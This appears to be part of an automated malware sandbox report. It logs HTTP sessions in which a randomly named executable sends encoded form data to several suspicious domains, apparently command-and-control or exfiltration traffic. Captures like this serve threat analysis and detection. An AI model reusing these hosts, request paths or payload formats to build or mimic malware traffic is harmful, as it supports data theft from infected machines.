                                                                                                                          Data Ascii: V8=+pcN4hPSqkK9vSrfgVFyMbVRAAgPEcMoEVCRYxvuOWS9ngqSDpqDNB+RXl1r+80jjSwiwFGKc/1UdZFO71xU88CS3Mv0iLXtbdYn4RgDiq8rW7smlH9ifbzqceCVxr7rzHQH3EjjL5PRF535eAsaUEF/ZtizW1qhVMJfFQzRC1L6m7OfIejaPX5aYniyUNJUVCWCGwhGn3fvSRX2kUWHYSs8gg2/F+Gi5HFv8O8VJm3B7lYBBpNAXM0LO6k5JeAw4Zv/xzX0gER4HdKGcsg7Oluc6+3mV5F3z3IvjOCWHaX1RVOdrQSs7F+kKkZxKh/4vNZ2WWms8DZLCXDXesUUA5OxTPqpRLTZp7OwSX9zo/Q+9Kb8ndJNL7dJVWcWSJuJEurOxCssteJL6ji8zcLd0zzJ6DQFMIa5L7wRILUhTCgvy/Uw6Dl0NWnqvvkYHyoRCDJsbL5XsWJPa8WknAXOXuKjECBgDcxrf5Q6treIsgouNj6aYRwjHKSZZ9duz8xm4Ofa5FdR/qIuiPsdiYLtnTAWVt0N9uPmJXBeIu9t6JHv/QVPTtonegpDwHBGO/C8C2Gy/zwI8L23AOLR8VUgb7/f9eDwZL9sWpphnE07wnxx8q/ePKsfN5QT/NUWXe14wtZQGQjJZXxaYD21zWTsGoNuBpfMS7GBTe2PgQ7HCwBjG8ASR+ecQeAT7o398UZTX08AI5SJ9k/MEJqn7yG0/Myr1VLeu6Z+ICbw7EC+/o1FSyO6pSf7/oVwX7KW2uG/oNJPu2AEMHq8V+3SxEfG6vuvJVF9WNeNw0Fjh/3pJv65fmFajwYUpAGpMYGuEdmxX0bclVvtoUKX11eFzHM7pW4z6j1fEcMtsvxAwgSz+e2wXR4WdmMfN+Fdt41OpvaLcG9vRo8ahKbJ6qeE1DaUuRosSEb7BdT8idaTbrxYKDbqgK2/t3SARd5v3YkgP+JClTNeTI7FQ0LAFfcDVn0aJBSvFUImZNlPZjunMwTfwLej+z2ze [TRUNCATED]


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          16192.168.2.54999285.159.66.93802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:00.304539919 CET577OUTGET /2a2y/?V8=zr0t7ULZxVzE+inLl39bbZB0JWpZLO1MICTJQG7tLn2thDr4Npa0BGL0Ak9UxK4o8AAox0GxcOxKU7Jm8nxF3e2PjP20+tvZNqonqnl/jekGCshc02lZKK7JWM700euXhA==&Bb6h7=gBiPvnrHa HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.fersigorta.xyz
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:43:01.012867928 CET225INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx/1.14.1
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:00 GMT
                                                                                                                          Content-Length: 0
                                                                                                                          Connection: close
                                                                                                                          X-Rate-Limit-Limit: 5s
                                                                                                                          X-Rate-Limit-Remaining: 19
                                                                                                                          X-Rate-Limit-Reset: 2025-01-10T15:43:05.9036713Z


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          17192.168.2.549993188.114.97.3802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:06.069935083 CET815OUTPOST /rjsl/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/rjsl/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 68 7a 63 41 42 73 48 34 65 55 48 2b 49 51 34 58 57 6e 6c 69 49 35 72 4f 6b 57 35 36 4b 51 73 31 69 56 77 67 6d 42 43 6e 72 59 33 32 76 74 76 58 56 64 4a 70 51 39 4f 44 4c 76 47 2b 2f 66 36 64 61 56 4c 74 63 6f 4d 4a 53 36 39 68 61 4b 57 7a 72 45 4d 5a 73 39 37 68 72 44 71 61 6f 73 79 55 4e 62 70 70 57 6c 62 30 64 74 50 43 30 36 4a 65 5a 61 5a 59 50 70 77 36 72 43 4f 77 52 59 30 55 45 75 49 64 72 4f 57 45 63 5a 48 66 36 30 2f 56 66 42 4f 58 50 64 45 42 36 42 55 31 36 39 47 52 46 77 73 69 65 46 33 51 64 38 49 59 44 44 55 50 2f 2b 6a 52 6f 45 64 36 43 6e 48 43 77 55 53 48 50 77 74 74 77 43 30 3d
                                                                                                                          Data Ascii: V8=hzcABsH4eUH+IQ4XWnliI5rOkW56KQs1iVwgmBCnrY32vtvXVdJpQ9ODLvG+/f6daVLtcoMJS69haKWzrEMZs97hrDqaosyUNbppWlb0dtPC06JeZaZYPpw6rCOwRY0UEuIdrOWEcZHf60/VfBOXPdEB6BU169GRFwsieF3Qd8IYDDUP/+jRoEd6CnHCwUSHPwttwC0=
                                                                                                                          Jan 10, 2025 16:43:06.731039047 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:06 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pc%2BDWhbJosABJHjXLBnEvuHq37%2FwNbbjkOexN2lDcRglgYBK71mIzj99NfOila8gAB%2FqqUObs5QDsxSn8%2FHS7c1163%2F0DFt912eBHlco1aKYn39Hn2viF2LAwTUQz%2FI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc7e17b1a4304-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1579&min_rtt=1579&rtt_var=789&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=815&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body>
                                                                                                                          Jan 10, 2025 16:43:06.731060028 CET18INData Raw: 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: </html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          18192.168.2.549994188.114.97.3802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:08.623779058 CET835OUTPOST /rjsl/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 223
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/rjsl/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 68 7a 63 41 42 73 48 34 65 55 48 2b 4c 7a 67 58 55 41 78 69 50 5a 72 4e 76 32 35 36 42 77 74 38 69 56 30 67 6d 46 61 33 72 4b 54 32 76 4a 72 58 55 59 31 70 58 39 4f 44 45 2f 47 78 69 50 37 52 61 56 48 6c 63 70 67 4a 53 36 35 68 61 49 2b 7a 72 7a 67 59 74 74 37 6e 2b 54 71 55 6c 4d 79 55 4e 62 70 70 57 6c 2f 4f 64 74 58 43 30 4c 35 65 59 37 5a 5a 46 4a 77 6c 73 43 4f 77 47 49 30 51 45 75 49 2f 72 50 36 69 63 63 62 66 36 30 50 56 65 51 4f 51 47 64 45 44 6e 52 56 31 30 50 72 68 4a 43 30 79 54 6a 47 4e 42 74 38 77 47 31 6c 6c 6c 63 72 35 37 6b 78 43 53 30 50 31 68 6b 7a 75 56 54 39 64 75 56 67 7a 4d 54 32 64 2b 6c 6c 6d 51 6d 52 4a 66 50 47 36 39 34 4e 38
                                                                                                                          Data Ascii: V8=hzcABsH4eUH+LzgXUAxiPZrNv256Bwt8iV0gmFa3rKT2vJrXUY1pX9ODE/GxiP7RaVHlcpgJS65haI+zrzgYtt7n+TqUlMyUNbppWl/OdtXC0L5eY7ZZFJwlsCOwGI0QEuI/rP6iccbf60PVeQOQGdEDnRV10PrhJC0yTjGNBt8wG1lllcr57kxCS0P1hkzuVT9duVgzMT2d+llmQmRJfPG694N8
                                                                                                                          Jan 10, 2025 16:43:09.258049965 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:09 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OWinsN31JzsQZw7JzKqeKTpg7lqpIJI2rxWHtydEFrmrakF8qtHuq3CqEEtIZjdmDTUqlbWZX%2B3LzkR8D5oKYTTKvWQxwN0zMKSRiDWSmc50JyXcdun3qcNCkRPgsIE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc7f16fc072bc-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1865&min_rtt=1865&rtt_var=932&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=835&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>
                                                                                                                          Jan 10, 2025 16:43:09.258068085 CET8INData Raw: 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          19192.168.2.549995188.114.97.3802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:11.199774027 CET1852OUTPOST /rjsl/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 1239
                                                                                                                          Origin: http://www.vh5g.sbs
                                                                                                                          Referer: http://www.vh5g.sbs/rjsl/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 68 7a 63 41 42 73 48 34 65 55 48 2b 4c 7a 67 58 55 41 78 69 50 5a 72 4e 76 32 35 36 42 77 74 38 69 56 30 67 6d 46 61 33 72 4b 62 32 76 36 6a 58 56 2f 68 70 57 39 4f 44 48 2f 47 6c 69 50 36 4c 61 57 33 68 63 70 39 79 53 34 78 68 63 70 65 7a 67 6e 30 59 6e 74 37 6e 6d 6a 71 56 6f 73 7a 4f 4e 61 5a 74 57 6c 76 4f 64 74 58 43 30 49 68 65 59 71 5a 5a 57 5a 77 36 72 43 4f 73 52 59 30 30 45 75 42 64 72 50 4f 79 63 76 44 66 36 55 66 56 54 44 6d 51 45 39 45 37 6d 52 56 62 30 50 6e 2b 4a 43 34 2b 54 6e 4f 6e 42 71 51 77 46 45 35 7a 36 39 44 52 6d 57 70 4e 5a 31 48 70 67 43 37 58 61 79 68 51 70 56 4d 50 47 54 65 6a 7a 67 68 36 54 43 41 6c 4c 62 6d 33 2f 4d 30 52 59 2b 38 42 37 73 66 37 39 69 37 6d 4f 54 71 70 55 67 64 50 47 38 47 63 35 75 30 66 6c 2f 48 34 61 4a 36 31 4d 53 51 74 52 46 65 76 53 39 63 6d 79 59 34 68 54 45 55 6e 6e 79 75 59 65 4b 62 59 67 34 49 43 67 37 35 63 41 42 52 7a 49 38 68 59 45 6d 6e 46 6d 75 49 37 78 73 30 30 4c 4c 57 51 6e 57 32 6c 56 48 6b 73 41 71 50 57 65 69 68 76 6c 4b 6e [TRUNCATED]
                                                                                                                          Data Ascii: V8=hzcABsH4eUH+LzgXUAxiPZrNv256Bwt8iV0gmFa3rKb2v6jXV/hpW9ODH/GliP6LaW3hcp9yS4xhcpezgn0Ynt7nmjqVoszONaZtWlvOdtXC0IheYqZZWZw6rCOsRY00EuBdrPOycvDf6UfVTDmQE9E7mRVb0Pn+JC4+TnOnBqQwFE5z69DRmWpNZ1HpgC7XayhQpVMPGTejzgh6TCAlLbm3/M0RY+8B7sf79i7mOTqpUgdPG8Gc5u0fl/H4aJ61MSQtRFevS9cmyY4hTEUnnyuYeKbYg4ICg75cABRzI8hYEmnFmuI7xs00LLWQnW2lVHksAqPWeihvlKnfkzLy0XxyGAgZPt7cUHGTWY2lSLNvobwyH7v6WyA5KzVEoXQSN//eYzq95E1L0gCF3SRAUqS6d5PJO2uHQZjphH0+4ieon4l6IdfUF+uJviJ4Wrd3A0g9bj4xPZ34zlJNfXM3H3QNbpJUWwWvUyom0buNlEnOgHd7X99cW32s/ibr3go6PN9sMBK9G55guXfN88pE49pNHwD+bG9iu6RgTSIwMFgUaah+b9pBHdFE33/LysFcu8zHfWk1DXRBDEvapunZcz+o4K4gRgtIA2NWiGvnHxhv0s5Iof5owoQjuy/OjwOFFV3GwfgCRPfbG030kXyLQafrnHI3Xl5+r+OI4sOm8MfeyHaf5APl+leKQRIC6vjQbqQibi9QRLQ0LE9l0hbxnphmalmLxl9ozb1tKymdDEHQPVMTbCNv4Bw5lrkTe7uVU+Mrs9U3nQCem/UZ9QXoOX8ha/qjvR+6RCMC+DOlZzk/EmYiqUe4+S5/PTxonwIdUM71Y2mZyYecMMzgDqXLvj+n8uLZaTQnRMtWUsFHan1S3lq3a9PYk3ZX6TwlYEi1s7jIs7sXd6HSpIvCbRgo9OQ/CjLzGIgpZ5iPgRZHOI1GGQdV16GrhHnFAWNALJJT7oGlMQw2rln12EEbYwKNhjZb4FPfu26wVFt8im8Ttcy7/zIgc [TRUNCATED]
                                                                                                                          Jan 10, 2025 16:43:11.873975992 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:11 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CP9m%2BJ3jTxh%2FB9dUeNpI66TMTvLeGYIrvJWotViykKqCeU3%2FLv3F0PHNFDvK98RQjOHACxcWKy6dEYquJq4ecFT2vOO6PSJhzi9I3xqQ2bjl3h2rOMSss%2BzVVErIddQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc8018c15c448-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1469&min_rtt=1469&rtt_var=734&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1852&delivery_rate=0&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body><
                                                                                                                          Jan 10, 2025 16:43:11.873991966 CET15INData Raw: 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: /html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          20192.168.2.549996188.114.97.3802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:13.742938995 CET571OUTGET /rjsl/?Bb6h7=gBiPvnrHa&V8=sx0gCczAFgj7YDMYbB9bVpPFqR0YAiUYulJ6hk/85bzVk72pU9tIUNjCR8r6jdWIfUnKZpAIPKdoUazogFVKlOHV8iazh43WTNlrbye2V7vv7YwuIZQBC8MvvBeXOotBVw== HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.vh5g.sbs
                                                                                                                          Connection: close
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Jan 10, 2025 16:43:14.364311934 CET1236INHTTP/1.1 301 Moved Permanently
                                                                                                                          Date: Fri, 10 Jan 2025 15:43:14 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
                                                                                                                          Location: http://www.vh5g.sbs/
                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                          Referrer-Policy: no-referrer-when-downgrade
                                                                                                                          Content-Security-Policy: default-src 'self' http: https: ws: wss: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                                                                          Permissions-Policy: interest-cohort=()
                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yGh75SXJW15AhAkhzEmR6enS8L7%2BFURIFdV3IaI2d5aALr5u5q%2FXD1tJBYxijv%2BjSuiPNH%2FncYMqPCAKExnUwlZp4z6ycCmTYR87FK469gTGNJYjECFsQw3kzQ231aw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 8ffdc8117f9f5e82-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1702&min_rtt=1702&rtt_var=851&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=571&delivery_rate=0&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                          Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f
                                                                                                                          Data Ascii: a2<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></
                                                                                                                          Jan 10, 2025 16:43:14.364327908 CET14INData Raw: 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: html>0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          21192.168.2.549997199.59.243.228802412C:\Program Files (x86)\NRsiJCiVwpoShpkQEZDbuMKFJSbzegOUCaViPGnaM\WnOFOMnqmLQAP.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 16:43:27.747950077 CET851OUTPOST /8efo/ HTTP/1.1
                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                          Accept-Language: en-US
                                                                                                                          Host: www.marketyemen.holdings
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Connection: close
                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                          Content-Length: 203
                                                                                                                          Origin: http://www.marketyemen.holdings
                                                                                                                          Referer: http://www.marketyemen.holdings/8efo/
                                                                                                                          User-Agent: Mozilla/5.0 (Linux; Android 4.0.4; Mystery Android Smart TV Build/MYSTERY.SMARTTV.20130816) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.107 Safari/537.36 OPR/29.0.1809.93516
                                                                                                                          Data Raw: 56 38 3d 65 30 6c 6d 72 66 48 74 6c 2f 47 4c 69 4b 50 6f 4f 57 49 64 35 4f 6b 38 52 57 2b 52 77 53 6e 4b 6e 4e 48 6e 65 4a 79 74 70 44 4c 58 38 57 4a 39 2f 6c 36 68 2b 78 6b 52 50 2b 54 2f 33 76 47 68 57 59 30 39 45 46 31 57 71 4c 67 72 52 34 65 56 4b 57 32 55 65 34 2f 66 39 4f 76 58 6e 61 68 42 35 4d 4a 34 2b 77 32 6f 70 78 4a 4f 64 78 69 41 38 67 6c 4f 75 6c 4a 6e 6e 48 46 45 4c 61 6a 39 41 36 57 4d 38 34 76 5a 44 34 75 42 48 37 78 43 6f 75 7a 58 36 4f 71 6a 33 42 6c 65 65 4b 63 61 4b 4f 6f 6b 48 4b 57 53 64 31 35 58 63 65 67 68 45 70 36 53 4c 65 75 55 44 57 41 56 50 59 47 34 44 74 57 50 59 54 41 3d
                                                                                                                          Data Ascii: V8=e0lmrfHtl/GLiKPoOWId5Ok8RW+RwSnKnNHneJytpDLX8WJ9/l6h+xkRP+T/3vGhWY09EF1WqLgrR4eVKW2Ue4/f9OvXnahB5MJ4+w2opxJOdxiA8glOulJnnHFELaj9A6WM84vZD4uBH7xCouzX6Oqj3BleeKcaKOokHKWSd15XceghEp6SLeuUDWAVPYG4DtWPYTA=
                                                                                                                          Jan 10, 2025 16:43:28.215792894 CET1236INHTTP/1.1 200 OK
                                                                                                                          date: Fri, 10 Jan 2025 15:43:27 GMT
                                                                                                                          content-type: text/html; charset=utf-8
                                                                                                                          content-length: 1146
                                                                                                                          x-request-id: 1fb8d70f-e970-4161-b733-865f50cf3d7f
                                                                                                                          cache-control: no-store, max-age=0
                                                                                                                          accept-ch: sec-ch-prefers-color-scheme
                                                                                                                          critical-ch: sec-ch-prefers-color-scheme
                                                                                                                          vary: sec-ch-prefers-color-scheme
                                                                                                                          x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_dFzcnFaIsmg10w3YMLQHdH7AQPr0aO9byyxRY7gSYhc2mVgp1aFM6M75oPK4dE8qKpntepeXPhTM8JG3qNvOCA==
                                                                                                                          set-cookie: parking_session=1fb8d70f-e970-4161-b733-865f50cf3d7f; expires=Fri, 10 Jan 2025 15:58:28 GMT; path=/
                                                                                                                          connection: close
